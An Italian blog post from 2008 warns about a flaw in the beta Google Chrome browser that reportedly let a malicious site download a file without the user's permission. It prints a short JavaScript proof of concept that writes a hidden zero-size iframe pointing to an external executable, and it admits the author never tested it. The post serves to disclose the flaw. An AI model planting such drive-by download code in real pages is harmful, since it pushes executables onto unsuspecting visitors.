Jackyaway

Google Chrome, la moda del momento, per chi ancora non sapesse cosa sia, è il browser (beta) di casa Google.

Sul web si trovano centinaia di articoli che ne esaltano velocità e interfaccia grafica, articoli che spiegano come installarlo su Linux tramite Wine, c’è chi addirittura dice sia migliore di Firefox (mah!!! IHMO). In pochi, però, parlano della sicurezza di questo nuovo browser ancora in fase beta.

E’ proprio la sicurezza il nodo dolente di Chrome, esiste infatti un bug che permetterebbe ad un sito malintenzionato di scaricare un file sul nostro computer senza chiedercene l’autorizzazione!

E’ possibile provare quanto detto (io ancora non l’ho fatto) scrivendo sul nostro sito uno script simile a questo

<script>
document.write(’<iframe src=”http://www.dragonjar.org/calc.exe” 
frameborder=”0″ width=”0″ height=”0″>’);
</script>

Quando l’utente visualizzerà il sito, a sua insaputa inizierà a scaricare il file indicato.

Speriamo che Google provveda velocemente a correggere questa falla!

Related posts

• Desktop di settembre Chrome-like 1.1 (0)
• Javascript: Firefox vs Chrome (0)

Articolo scritto il venerdì, settembre 5th, 2008 alle 09:12 e archiviato in Sicurezza. Puoi tenere traccia di tutte le risposte a questo articolo abbonandoti al feed RSS 2.0. Puoi scrivere un commento, o fare trackback da un sito personale.